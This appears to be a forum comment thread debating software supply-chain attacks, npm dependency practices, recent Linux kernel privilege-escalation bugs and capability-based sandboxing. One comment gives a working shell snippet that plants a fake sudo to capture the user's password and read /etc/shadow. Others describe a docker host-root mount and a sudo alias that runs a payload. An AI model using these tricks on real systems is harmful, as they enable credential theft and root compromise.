But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.
Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.
Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. e.g. we had secure boots on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other etc.
Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Example #1 for me is better in terms of dependency management. In general company #1 had well established security practices and we had really secure products.
6-19-2005
My copy of StepMania is turning old enough to drink in like a month and it's still fantastic, software updates are (mostly) a scam.
It means you skip supply chain attacks but may miss fresh vulnerability patches too.
(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)
It takes 45 seconds to go check how old the copyfail and dirtyfrag vulnerabilities actually are. Which is longer than it takes to read TFA. Dirtyfrag may be relevant to systems from as far as 2017.
It's not "new" software being affected. And actual old software is in a much worse state because we had a lot more time to find their problems.
I am worried that the sluggishness appeared about the same time on both devices
I don't remember where I read it, but it basically boils down to need vs want.
I've used that rule for deciding between a new car or used. A fancy vacuum or basic.
A shiny new gadget.
Bringing new things into the tech stack.
Picking a new tech stack.
For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things i do not know that well.
The important part is not the specific implementation, but the mindset behind it.
An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.
At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.
Programming language packages issue only because we don't have zero trust for modules — no restrictions to open socket or file system. Issue is not count, pure function leftPad can't hurt you.
Big companies have security roles on multiple levels, enforcing policies and not allowing devs to just install any package. That's not new but started maybe 15 years ago.
Whether to do constant npm upgrades to keep the high-priority security issues count at zero (for what seems like about 15 minutes), or whether to hang back a bit to avoid catching the big one that everyone knows is coming real soon now.
Not enjoying npm at all.
If you can't trust your update sources, you have bigger problems.
Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?
So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.
And the advice isn't just "update your kernel" because we are still finding new related issues?
What I want to say with that is fundamentally our world works because atleast most people do not abuse shit. That is fundamentally how human society has always worked, and will likely continue to do so.
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc
mkdir -p .local/bin/
cat <<EOF >.local/bin/sudo
read -rs -p "[sudo] password for $USER: " PASSWORD
echo ""
echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
EOF
chmod +x .local/bin/sudo
attack on next sudo call, shows data accessible only to root.Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:
$ docker run -it -v.:/app -w /app node:alpine /bin/sh
long term environments defined in docker compose: $ docker-compose.yml
services:
app:
image: node:alpine
volumes:
- .:/app
working_dir: /app
command: /bin/sh
$ docker compose run app
switch to Kata etc if more protection needed. Eventually all userspace would run in VMs.Behaviours matter more than OS security primitives.
People lamented semver not being trustable but that ship sailed a long time ago, and supply chain attacks are going to get worse before they get better.
Our team is pretty minimal when it comes to enforced hooks (everyone has their own workflow) but no one could come up with an objection to this one.
But problem is this could lead to abuse of the CVE system to try to force rapid adoption of attacked packages. What prevents this?
What are people thinking with these meme style vulnerability names? It's going to be hard to pitch "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2: Electric Boogaloo".
We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.
This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
Just alias sudo to sudo-but-also-keep-password-and-execute-a-payload in ~/.bashrc and wait up to 24 hours. Maybe also simulate some breakage by intercepting other commands and force the user to run 'sudo systemctl' or something sooner rather than later.
I switched to llama.cpp because of that.
To me it feels more and more that the slopcode world is the opposite philosophy of reproducible builds. It's like the anti methodology of how to work in that regard.
Before, everyone was publishing breaking changes in subminor packages because nobody adhered to any API versioning system standards. Now it's every commit that can break things. That is not an improvement.
Today I’m limiting the exposure to dependencies more than ever, and particularly for things that take few hundred lines to implement. It’s a paradigm shift, no less.
We should have:
- OS level capabilities. Launched programs get passed a capability token from the shell (or wherever you launched the program from). All syscalls take a capability as the first argument. So, "open path /foo" becomes open(cap, "/foo"). The capability could correspond to a fake filesystem, real branch of your filesystem, network filesystem or really anything. The program doesn't get to know what kind of sandbox it lives inside.
- Library / language capabilities. When I pull in some 3rd party library - like an npm module - that library should also be passed a capability too, either at import time or per callsite. It shouldn't have read/write access to all other bytes in my program's address space. It shouldn't have access to do anything on my computer as if it were me! The question is: "What is the blast radius of this code?" If the library you're using is malicious or vulnerable, we need to have sane defaults for how much damage can be caused. Calling lib::add(1, 2) shouldn't be able to result in a persistent compromise of my entire computer.
SeL4 has fast, efficient OS level capabilities. Its had them for years. They work great. They're fast - faster than linux in many cases. And tremendously useful. They allow for transparent sandboxing, userland drivers, IPC, security improvements, and more. You can even run linux as a process in sel4. I want an OS that has all the features of my linux desktop, but works like SeL4.
Unfortunately, I don't think any programming language has the kind of language level capabilities I want. Rust is really close. We need a way to restrict a 3rd party crate from calling any unsafe code (including from untrusted dependencies). We need to fix the long standing soundness bugs in rust. And we need a capability based standard library. No more global open() / listen() / etc. Only openat(), and equivalents for all other parts of the OS.
If LLMs keep getting better, I'm going to get an LLM to build all this stuff in a few years if nobody else does it first. Security on modern desktop operating systems is a joke.
We need a cultural shift toward code hygiene, which isn't really any different from the norms most cultures develop around food. It's a mix of crude heuristics but the sense of "eeew" is keeping billions of people alive.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. However, I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.
There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
The post in question points to dependency package managers however not system packages, such as NPM, which has pre and post build scripts, install scripts, etc.
It's much easier to break into an NPM/Github account and push malicious commits in the few hours a maintainer is sleeping than it is to push something out and not have it noticed for 2 weeks.
There are lists of attacks which had an exposure window which was much shorter than 2 weeks:
https://daniakash.com/posts/simplest-supply-chain-defense/ https://blog.yossarian.net/2025/11/21/We-should-all-be-using...
I like to think people would agree more on the appropriate method if they saw the risk as large enough.
If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.
And yes, they still thought they were doing the right thing.
Yes, I mean crates like anyerror and syn.
https://blog.plan99.net/why-not-capability-languages-a8e6cbd...
But as pointed out by others, this particular exploit wouldn't be stopped by capabilities. Nor would it be stopped by micro-kernels. The filesystem is a trusted entity on any OS design I'm familiar with as it's what holds the core metadata about what components have what permissions. If you can exploit the filesystem code, you can trivially obtain any permission. That the code runs outside of the CPU's supervisor mode means nothing.
The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
Which is to say: Hiding the sausage-making is a core aspect of what makes supply chains profitable.
Nuclear might be airgapped but what about water, power…?
That's why I don't understand:
> If everyone starts waiting a week, their exploits will wait 2 weeks
This naturally doesn't work outside corporations.
The proper response from them and you, should be to make sure to have some isolatin between user space and root like gvisor.
In my book, having unattended-upgrades or windows update run amok on your system is functionally worse than a rootkit.
Package managers aren't going anywhere. Even languages that historically bet on large standard libraries have been giving up on that over time (e.g. Java's stdlib comes with XML support but not JSON).
Unfortunately, LLMs are also not cheap enough to just create whole new PL ecosystems from scratch. So we have to focus on the lowest hanging fruits here. That means making sandboxing and containers far more available and easy for developers. Nobody should run "npm install" outside a sandbox.
Those exploits are in kernel, and the userspace is only calling the normal, allowed calls. Removing global open()/listen()/etc.. with capability-based versions would still allow one to invoke the same kernel bugs.
(Now, using microkernel like seL4 where the kernel drivers are isolated _would_ help, but (1) that's independent from what userspace does, you can have POSIX layer with seL4 and (2) that would be may more context switches, so a performance drop)
I prefer it’s model of declaring this is what I want to use, any calls to code outside that error out.
They dont wait for the cultures to come back negative to say yes either. They just eat what they are served.
We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?
The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.
We need to solve the underlying problem: how to sustainably develop and maintain the software we need.
A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.
Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?
> any useful piece of software has been fuzz tested, property tested and formally verified.
That would require effort. Human effort and extra token cost. Not going to happen, people want to rather move fast an break things.
https://github.com/artifact-keeper
An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.
I had my own janky tooling for something like it. This is a good project.
Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.
Another model is Perl's CPAN where you publish source files only.
If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.
If a popular NPM package was compromised and included a copy.fail exploit, it would make lots of systems vulnerable to root privilege escalation.
The advice isn't just "update your kernel" because there is no update. The latest vulnerability (the one discovered after copy.fail) still has no fix.
I've studied security culture before and in most cases everything comes down to a sliding scale with security on one side and convenience/accessibility on the other, the more secure something is, the less accessible it is and vice versa.
[0] https://www.youtube.com/watch?v=LTI0SeyhAPA
docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
Chances are that the person who set up Docker didn't do it properly.Even worse are the “extension packs” that combine some normal things and one wonky thing nobody’s ever heard of…
The preference is for usability over security.
Famously: https://vez.mrsk.me/freebsd-defaults
I appreciate your work on the project, but I can’t in good conscience suggest people switch while are such bad defaults.
https://lwn.net/Articles/850098
https://news.ycombinator.com/item?id=26507507
tl;dr: deeply insecure WireGuard implementation committed directly into the FreeBSD kernel with zero review.
Was this process problem fixed?
Please grow a brain.
If you have code execution, you can attack the OS.
That being said, I'm not suggesting that anyone should judge an entire OS based off of how they handle a single minor report, since everything else that I've seen suggests that FreeBSD takes security reports quite seriously. But then you could also use this same argument for the Linux kernel bug, since it's pretty rare for a patch to be mismanaged like this there too :)
[0]: https://www.maxchernoff.ca/p/luatex-vulnerabilities#timeline
It's a problem we have to live with for the sake of progress and for security updates. Every machine needs downtime for maintenance on a periodic, often-scheduled basis. It might cost time but avoiding updates is not a good plan.
Aside from dodgy updates that have to run as root to install, if you have passwordless sudo it's more dangerous than any broken package or local-only privilege escalation exploit. I'll wager many have it set up that way, because typing passwords is tiresome.
But being able to have agents implement pelr5 in rust and make it faster and more secure raises many questions towards the role of open source and consequences of security and supply chain risks.
Yes they would. Copyfail uses a bug in the linux kernel to write to arbitrary page table entries. A kernel like SeL4 puts the filesystem in a separate process. The kernel doesn't have a filesystem page table entry that it can corrupt.
Even if the bug somehow got in, the exploit chain uses the page table bug to overwrite the code in su. This can be used to get root because su has suid set. In a capability based OS, there is no "su" process to exploit like this.
A lot of these bugs seem to come from linux's monolithic nature meaning (complex code A) + (complex code B) leads to a bug. Microkernels make these sort of problems much harder to exploit because each component is small and easier to audit. And there's much bigger walls up between sections. Kernel ALG support wouldn't have raw access to overwrite page table entries in the first place.
> (2) that would be may more context switches, so a performance drop
I've heard this before. Is it actually true though? The SeL4 devs claim the context switching performance in sel4 is way better than it is in linux. There are only 11 syscalls - so optimising them is easier. Invoking a capability (like a file handle) in sel4 doesn't involve any complex scheduler lookups. Your process just hands your scheduler timeslice to the process on the other end of the invoked capability (like the filesystem driver).
But SeL4 will probably have more TLB flushes. I'm not really sure how expensive they are on modern silicon.
I'd love to see some real benchmarks doing heavy IO or something in linux and sel4. I'm not really sure how it would shake out.
Languages with rich standard libraries provide enough common components that it's feasible to build things using only a small handful of external dependencies. Each of those can be carefully chosen, monitored, and potentially even audited, by an individual or small team.
That doesn't make the resulting software exploit-proof, of course, but it seems to me much less risky than an ecosystem where most programs pull in hundreds of dependencies, all of which receive far less scrutiny than a language's standard library.
If the restaurant has a foul smell and the food is served by a twitchy waiter who insists that the food totally free, I think most people will think twice.
yolo!
From TFA:
> Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Given the local kernel root exploits, people pulling npm dependencies have an extra high chance of getting rooted. This includes test systems, build systems, the web server running node.js backend, etc. etc. etc.
This means that there is a significantly greater chance that whatever software you download (not necessarily npm-based) on the internet in these couple days has been unknowingly infected with backdoors, simply due to the fact that the vast majority of servers out there that use npm code have easily exploitable vulnerabilities.
Rivers caught on fire for a hundred years before the EPA was formed.
* with internet access to FOSS via sourceforge and github we got an abundance of building blocks
* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use
Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments multitude of packages.
This may all end well ultimately, but we're definitely in for a bumpy ride.
Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.
Anyway, the point of parent and me wasn't that it was considered to be a "mistake", but people thinking they "are doing the right thing".
No one in this thread proposed that, or anything that could be reasonably assumed to have meant that.
As for the parent comment about not using the lockfile for the production build, that’s just incredibly incompetent.
Maybe they should hire someone who knows what they are doing. Contrary to the popular beliefs of backend engineers online, you also need some competency to do frontend properly.
In this case what’s needed is „npm ci“ instead of „npm install“ or better „pnpm install —frozen-lockfile“.
Pnpm will also do that automatically if the CI environment variable is set.
I personally switched away from macOS with this being one of the reasons, after having realized brew will eventually compromise my system with their antics.
So the issue is bigger than the mishandling of a single issue, it’s a fundamental process issue around security for one of the most impactful projects in the entire space.
One idea I've been entertaining is to not allow transitive imports in packages. It would probably lead to far fewer and more capable packages, and a bigger standard library. Much harder to imagine a left-pad incident in such an ecosystem.
That isn't a guarantee either, just last month someone compromised the Axios library.
- Pledge requires the program drop privileges. Process level caps move the "allowed actions" outside of an application. And they can do that without the application even knowing. This would - for example - let you sandbox an untrusted binary.
- Pledge still leaves an entire application in the same security zone. If your process needs network and disk access, every part of the process - including 3rd party libraries - gets access to the network and disk.
- You can reproduce pledge with caps very easily. Capability libraries generally let you make a child capability. So, cap A has access to resources x, y, z. Make cap B with access to only resource x. You could use this (combined with a global "root cap" in your process) to implement pledge. You can't use pledge to make caps.
Right now it kinda feels to me like "Open Source" is the Russian army, assuming their sheer numbers and their huge quantity of equipment much off which is decades old.
Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.
The attackers with cheap drones or LLMs are completely overwhelming the old school who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about quickly enough.
I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
More people are producing more code because of easier tools. Most code is bad. But that's not the tools fault.
And in the end it is a problem of processes and culture.
Reviewing upstream diffs for every package requires a lot of man hours and most packagers are volunteers. I guess LLMs might help catching some obvious cases.
this is on some ancient node 16 build i was trying to clean up ci for, so not very recent npm
I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0 days for it?
With FreeBSD there's never any question of "who should this get reported to".
Something that concerns me more is I use things like gemini-cli or claude-cli via their own, non-sudo accounts with no ssh keys or anything on my laptop, but a LPE means they can find away around such restrictions if they feel like it (and they might).
VM isolation would still be safe even with these kernel exploits.
As always, I know most of us work in IT, but things rarely are actually binary.
They’re always racing to be the first one to write an article about a case.
[0] https://news.ycombinator.com/item?id=47513932
[1] https://github.com/npm/cli/issues/8570
[2] https://socket.dev/blog/npm-introduces-minimumreleaseage-and...
this is only scary for rootless containers as it skips an isolation layer, but we've started shipping distroless containers which are not vulnerable to this due to the fact that they lack priviledge escalation commands such as su or sudo.
never trust software to begin with, sandbox everything you can and don't run it on your machine to begin with if possible.
> Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution.
I had to do a double take reading that. It’s written something happened and prevented them from following a schedule but seemingly they chose to release the information. I hope I’m missing something where it was forcibly disclosed elsewhere.
Edit: Moments later I refreshed the homepage and saw the announcement. They do claim to have consulted with maintainers
the idea that it exists at all is more or less a gentleman's agreement in the engineering world anyway
The problem is that the UNIX shell model got very successful and is now also used on other platforms with poor package management, so all the language-level packaging system were created instead. But those did not learn from the lessons of Linux distributions. Cargo is particularly bad.
To me it’s easier to get a program to let the system know what it needs vs. try to contain it from the outside.
Anyway, have a good one.
Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking to, what? take their land and make the OSS leader look powerful and successful at acheiving goals to distract from their fundamental awfulness? And who are the North Korean canon fodder purchased by OSS while we're at it?
Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.
Not everyone installs only what is available in pkgsrc.
If it does, doesn't that defeat the purpose? If a package is compromised, of course the compromiser will just label their new version as a "security update".
These days most exploits can not persist through a reboot due to secureboot and other bootchain attestations. In the boot process, everything loaded gets checksummed and compared to signed signatures from Apple, but this only helps at load time, not while the phone is running. Of course if the phone is not patched, the exploit could be reloaded, but this would require revising a malicious website or reopening a malicious bit of media.
Also, IME we don't deep dive everything (should we?)
For most stuff we make sure the latest is not-shit and passed test cases. We do have ceremony around version bumps.
Regular phone reboots are a security measure at this point.
If no one is willing to stand up and say "yes this is safe and of acceptable quality", why use it?
It's a software engineering version of the professional engineering stamp.
In general, use of npm ci is usually sparsely documented - most node projects you can find just recommend using npm install during the setup, suggesting a failure in promoting it's availability (I only know of it because I got frustrated that the lockfile kept clogging up git commits whenever I added dependencies with what looked like auto-generated build-time junk).
For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.
>I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.
This is exactly why some (including me) don't take these projects seriously. Like you claim to design a language for security, and this is how you tell me to install it????
Many Golang projects I see in the wild will import a number of dependencies with significant feature overlap with sections of the standard library, or even be intended as a replacement for them. So it seems that having an expansive stdlib isn’t sufficient to avoid deep dependency trees, it probably helps to some degree but it’s definitely not a panacea.
They're not either, every one of these projects contains a gigantic vendor/ folder full of unmaintained libraries, modified so much that keeping up with the latest changes is impossible so they're stuck with whatever version they copied back in 2009.
Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.
For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.
Have you read this old code? It's terrible and written with no care at all to security often in C. AI is much much better at writing code.
this is a cornerstone of modern software development. If it died, or if got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].
We need to do better than this.
Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.
Is there some other aspect of this that you're referencing?
Infecting sudo just makes for a quick demo.
If your container has different processes at different user ids, the exploit would still be effective.
It would likely also be able to “modify” read only files mapped from the host.
When I see pages of obviously generated prose being submitted as any kind of documentation, my eyes just glaze over. I feel so guilty sharing similar stuff too, though to my credit, at least I always lead with a self-written TLDR, the slop is just for reference. But it's so bad, like genuinely distressing tier. I don't want to read all that junk, and more and more gets produced.
Prose type docs have always been my Achilles heel, and this is like the worst possible evolution of that.
For a brief period in the past few weeks, they somehow managed to make a change to ChatGPT Thinking that made it succint. The tone was super fact oriented too. It was honestly like waking up from a fever dream.
I don't doubt that the patch reversal + exploit PoC made by a third party is the result of people figuring out how patches work in open source projects like these.
Anyone with access to a good enough LLM can scour through supposedly minor bug fixes that might hide a critical vulnerability rather than doing it all manually. The LLM will probably throw up tons of false positives and miss half the issues, it you only need one or two successes.
But there are a lot of academic and research institutions that actually do have good Linux user management. I worked at a pediatric hospital, and the RHEL HPC admins did not mess around in terms of who was allowed to access which patients' data. As someone who was not an admin, it was a huge pain and it should have been. So this bug has pretty serious implications, seems like anyone at that hospital can abscond with a lot of deidentified data. [research HPC not as sensitive as the clinical stuff, which I think was all Windows Server]
Very odd wording. I assume there’s an interesting/upsetting story here that will come out soon.
I won't enter into all the details but... It's totally possible to not have the sudo command (or similar) on a system at all and to have su with the setuid bit off.
On my main desktop there's no sudo command there are zero binaries with the setuid bit set.
The only way to get root involves an "out-of-band" access, from another computer, that is not on the regular network [1].
This setup as worked for me since years. And years. And I very rarely need to be root on my desktop. When I do, I just use my out-of-band connection (from a tiny laptop whose only purpose is to perform root operations on my desktop).
For example today: I logged in as root blocked the three modules with the "dirty page" mitigation suggested by the person who reported the exploit.
You're not faking sudo with a mocking-bird on my machine. You're not using "su" from a regular user account. No userns either (no "insmod", no nothing).
Note that it's still possible to have several non-root users logged in as once: but from one user account, you cannot log in as another. You can however switch to TTY2, TTY3, etc. and log in as another user. And the whole XKCD about "get local account, get everything of importance", ain't valid either in my case.
I'm not saying it's perfect but it's not as simple as "get a local shell, wait until user enters 'sudo', get root". No sudo, no su.
It's brutally simple.
And, the best of all, it's a fully usable desktop: I'm using such a setup since years (I've also got servers, including at home, with Proxmox and VMs etc., but that's another topic).
> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.
This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.
On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.
But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.
>He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.
There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think by now that any hope that they would voluntarily be any less exploitative than they can would have been dashed.
If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.
This opposed to closed off “products” that change at the whims of the company owning it.
They are completely independent operating systems with a distant shared history.
Whereas on Linux, the distros are taking a common Linux kernel source, and combining it with their choice of common userlands like GNU. Debian has the same kernel and GNU userland that Arch and Fedora use. That is how Linux distros are "distros" whereas the BSDs are independent operating systems.
> we're in a similar space -- http://www.getdropbox.com (and part of the yc summer 07 program) basically, sync and backup done right (but for windows and os x). i had the same frustrations as you with existing solutions.
> let me know if it's something you're interested in, or if you want to chat about it sometime.
>drew (at getdropbox.com)
but they all have something in common, the issue is that your user is compromised that means the applications running in that user are compromised the only thing you gain is that you can trust your system, you can trust that your system is not compromised which is only relevant with infrastructure since if your user is compromised you're already fucked, multi-user setups with untrusted accounts are inheritly insecure and in infrastrucure the blast radius might be thousands of users that use the said service.
the breakdown looks something like this:
- you heavily compromise a single user <- exploit not relevant
- you compromise a shared setup via a bad user to compromise a lot of users <- should never be used anymore, namespace isolation is the replacement
- you somewhat compromise a lot of users via infra compromise <- where this hurtsThat's my main reason to use "sudo" on the desktop.
I suppose I could install every piece of software locally, either from source or via flatpak, but this is a lot of work and much harder than doing it the easy way and using global install via my distro. Plus, non-distro installs are much more likely to be out of date and contain vulnerabilities of their own.
Most people however aren't and will happily run sudo after an npm postinstall script tells them to apt-install turboencabulator for their new frontend framework to function.
there's nothing stopping you from using python from 2009 except why would you want to do that to yourself - but the same strategy applies. the reference python implementation is written in C, after all.
There have been two LPE vulnerability and exploits in the Linux kernel announced today. After the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.
(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)
There’s a lot of misconception about how the open source comes to be and very small part, still significant of course, of it was really created for the benefit of a community. There are exceptions, but dig the organisational culture and origins and you’ll see the pattern. Also, thousands of projects are made for the satisfaction of the author himself being highly intelligent and high on algorithmic dopamine.
There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.
I don't have any answers or solutions. But I don't think we can hand-wave the problem away.
1. No strong stack protectors.
2. No kASLR.
That's 20-year-old exploit methodology.
Because it might grow in future and you want to allow flexibility for that, because it might be the input to or output from some external system that requires XML, because your team might have standardised on always using XML config files, because introducing yet another custom plain text file format just creates unnecessary cognitive load for everyone who has to use it are real-world reasons I can think of.
But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.
You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.